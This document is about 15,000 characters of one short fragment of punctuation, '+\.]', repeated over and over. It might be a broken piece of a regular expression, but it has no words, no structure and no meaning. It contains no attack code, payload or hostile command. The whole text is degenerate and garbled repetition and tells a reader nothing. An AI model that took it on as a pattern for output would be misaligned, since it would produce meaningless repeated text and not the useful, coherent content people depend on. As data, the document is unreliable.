+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]